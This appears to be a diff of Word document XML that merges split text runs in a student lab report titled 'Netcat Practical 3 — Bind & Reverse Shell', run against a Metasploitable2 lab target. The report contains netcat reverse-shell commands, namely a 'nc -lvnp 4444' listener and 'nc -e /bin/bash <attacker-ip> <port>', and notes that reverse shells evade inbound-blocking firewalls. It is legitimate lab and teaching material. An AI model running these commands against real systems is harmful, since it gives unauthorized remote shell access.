-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> again returned </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>msfadmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, and ls -la showed the same Metasploitable2 home directory as the bind shell. Changing into </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>kali_Documents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and creating names.txt with touch, then listing the directory again to see it appear, demonstrated that this is a fully interactive, persistent shell — not a one-off command — capable of navigating the filesystem and creating files, exactly like a normal terminal session on the target.</w:t>
+        <w:t>The commands confirmed this: whoami again returned msfadmin, and ls -la showed the same Metasploitable2 home directory as the bind shell. Changing into kali_Documents and creating names.txt with touch, then listing the directory again to see it appear, demonstrated that this is a fully interactive, persistent shell — not a one-off command — capable of navigating the filesystem and creating files, exactly like a normal terminal session on the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2497,29 +2096,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 2 — Kali (right) listening and receiving Metasploitable2's outbound connection (left), then running commands on the target, including creating names.txt inside </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>kali_Documents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Figure 2 — Kali (right) listening and receiving Metasploitable2's outbound connection (left), then running commands on the target, including creating names.txt inside kali_Documents.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2691,25 +2268,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>nc -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>lvnp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 4444 (Kali)</w:t>
+              <w:t>nc -lvnp 4444 (Kali)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2852,7 +2411,6 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2861,18 +2419,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>whoami</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> result</w:t>
+              <w:t>whoami result</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2892,7 +2439,6 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
@@ -2901,7 +2447,6 @@
               </w:rPr>
               <w:t>msfadmin</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2953,25 +2498,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">names.txt, created with touch inside </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>kali_Documents</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> on the target</w:t>
+              <w:t>names.txt, created with touch inside kali_Documents on the target</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3036,21 +2563,7 @@
               <w:rPr>
                 <w:color w:val="1A1A1A"/>
               </w:rPr>
-              <w:t xml:space="preserve">The reverse shell felt more realistic as an attack pattern: the target reaches out, so from the target's side it looks like ordinary outbound traffic rather than an open listening port waiting to be found. A firewall that blocks unsolicited inbound connections but allows outbound ones (a common default) would stop the bind shell in Section 1 but let this one through, which is exactly why reverse shells are the more commonly used technique in real engagements. Neither version here uses any encryption, so anyone capturing traffic on the network — which I could confirm later with </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="1A1A1A"/>
-              </w:rPr>
-              <w:t>tcpdump</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="1A1A1A"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> — would see every command and every reply in plain text.</w:t>
+              <w:t>The reverse shell felt more realistic as an attack pattern: the target reaches out, so from the target's side it looks like ordinary outbound traffic rather than an open listening port waiting to be found. A firewall that blocks unsolicited inbound connections but allows outbound ones (a common default) would stop the bind shell in Section 1 but let this one through, which is exactly why reverse shells are the more commonly used technique in real engagements. Neither version here uses any encryption, so anyone capturing traffic on the network — which I could confirm later with tcpdump — would see every command and every reply in plain text.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3089,25 +2602,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">The -e flag attaches a program to a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> connection, so its input and output travel over the network — this is what turns a plain pipe into a remote shell.</w:t>
+        <w:t>The -e flag attaches a program to a Netcat connection, so its input and output travel over the network — this is what turns a plain pipe into a remote shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3144,25 +2639,7 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Reverse shell: the attacker listens (nc -l) and the target connects out (nc -e /bin/bash &lt;attacker-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>&gt; &lt;port&gt;). This blends in better with normal outbound traffic and is the more commonly used pattern.</w:t>
+        <w:t>Reverse shell: the attacker listens (nc -l) and the target connects out (nc -e /bin/bash &lt;attacker-ip&gt; &lt;port&gt;). This blends in better with normal outbound traffic and is the more commonly used pattern.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3180,25 +2657,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">Once connected, either shell is fully interactive: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>, ls -la, cd and touch all worked exactly as they would in a normal terminal session on the target.</w:t>
+        <w:t>Once connected, either shell is fully interactive: whoami, ls -la, cd and touch all worked exactly as they would in a normal terminal session on the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3337,23 +2796,13 @@
       </w:pBdr>
       <w:jc w:val="right"/>
     </w:pPr>
-    <w:proofErr w:type="spellStart"/>
     <w:r>
       <w:rPr>
         <w:color w:val="4D4D4D"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t>Netcat</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:color w:val="4D4D4D"/>
-        <w:sz w:val="16"/>
-        <w:szCs w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> Practical 3 — Bind &amp; Reverse Shell</w:t>
+      <w:t>Netcat Practical 3 — Bind &amp; Reverse Shell</w:t>
     </w:r>
   </w:p>
 </w:hdr>
